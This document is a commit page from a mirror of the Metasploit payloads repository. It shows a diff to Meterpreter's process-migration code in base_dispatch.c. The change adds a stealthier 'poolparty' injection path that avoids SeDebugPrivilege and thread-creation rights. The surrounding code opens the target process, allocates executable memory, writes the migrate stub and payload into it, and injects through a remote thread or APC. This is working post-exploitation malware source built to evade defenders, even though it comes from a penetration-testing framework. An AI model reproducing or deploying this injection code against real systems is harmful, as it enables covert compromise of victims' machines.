github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-02-16 00:24:29 +01:00
Code Releases Activity

feat(injection): update base_dispatch to use inject_via_poolparty when possible

Browse Source
This commit is contained in:
dledda-r7 2024-08-01 05:18:31 -04:00
parent 7f66532422
commit 25ee5deddf
No known key found for this signature in database
GPG Key ID: 4D4EC504A1F02FFF
1 changed files with 42 additions and 26 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

26
c/meterpreter/source/metsrv/base_dispatch.c
View File

@ -540,6 +540,8 @@ BOOL remote_request_core_migrate(Remote * remote, Packet * packet, DWORD* pResul
MetsrvConfig* config = NULL;
DWORD configSize = 0;
BOOL bStealth = FALSE;
DWORD dwProcessAccess;
do
{
response = packet_create_response(packet);
@ -568,7 +570,9 @@ BOOL remote_request_core_migrate(Remote * remote, Packet * packet, DWORD* pResul
dprintf("[MIGRATE] Attempting to migrate. ProcessID=%d, Arch=%s", dwProcessID, dwDestinationArch == 2 ? "x64" : "x86");
dprintf("[MIGRATE] Attempting to migrate. PayloadLength=%d StubLength=%d", dwPayloadLength, dwMigrateStubLength);
// If we can, get SeDebugPrivilege...
bStealth = support_stealth_injection(dwDestinationArch);
if(!bStealth) {
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
{
TOKEN_PRIVILEGES priv = { 0 };
@ -586,9 +590,14 @@ BOOL remote_request_core_migrate(Remote * remote, Packet * packet, DWORD* pResul
CloseHandle(hToken);
}
}
dwProcessAccess = PROCESS_DUP_HANDLE | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION | PROCESS_VM_READ;
if (!bStealth) {
dwProcessAccess |= PROCESS_CREATE_THREAD;
}
hProcess = OpenProcess(dwProcessAccess, FALSE, dwProcessID);
// Open the process so that we can migrate into it
hProcess = OpenProcess(PROCESS_DUP_HANDLE | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, dwProcessID);
if (!hProcess)
{
BREAK_ON_ERROR("[MIGRATE] OpenProcess failed")
@ -630,6 +639,7 @@ BOOL remote_request_core_migrate(Remote * remote, Packet * packet, DWORD* pResul
dprintf("[MIGRATE] Duplicated Event Handle: 0x%x", (UINT_PTR)ctx->e.hEvent);
// Allocate memory for the migrate stub, context, payload and configuration block
lpMemory = (LPBYTE)VirtualAllocEx(hProcess, NULL, dwMigrateStubLength + ctxSize + dwPayloadLength + configSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (!lpMemory)
@ -639,7 +649,6 @@ BOOL remote_request_core_migrate(Remote * remote, Packet * packet, DWORD* pResul
// Calculate the address of the payload...
ctx->p.lpPayload = lpMemory + dwMigrateStubLength + ctxSize;
// Write the migrate stub to memory...
dprintf("[MIGRATE] Migrate stub: 0x%p -> %u bytes", lpMemory, dwMigrateStubLength);
if (!WriteProcessMemory(hProcess, lpMemory, lpMigrateStub, dwMigrateStubLength, NULL))
@ -670,6 +679,7 @@ BOOL remote_request_core_migrate(Remote * remote, Packet * packet, DWORD* pResul
free(ctx);
if (!bStealth) {
// First we try to migrate by directly creating a remote thread in the target process
if (inject_via_remotethread(remote, response, hProcess, dwDestinationArch, lpMemory, lpMemory + dwMigrateStubLength) != ERROR_SUCCESS)
{
@ -681,7 +691,13 @@ BOOL remote_request_core_migrate(Remote * remote, Packet * packet, DWORD* pResul
BREAK_ON_ERROR("[MIGRATE] inject_via_apcthread failed");
}
}
}
else {
if (inject_via_poolparty(remote, response, hProcess, dwDestinationArch, lpMemory, lpMemory + dwMigrateStubLength) != ERROR_SUCCESS)
{
BREAK_ON_ERROR("[MIGRATE] inject_via_poolparty failed");
}
}
dwResult = ERROR_SUCCESS;
} while (0);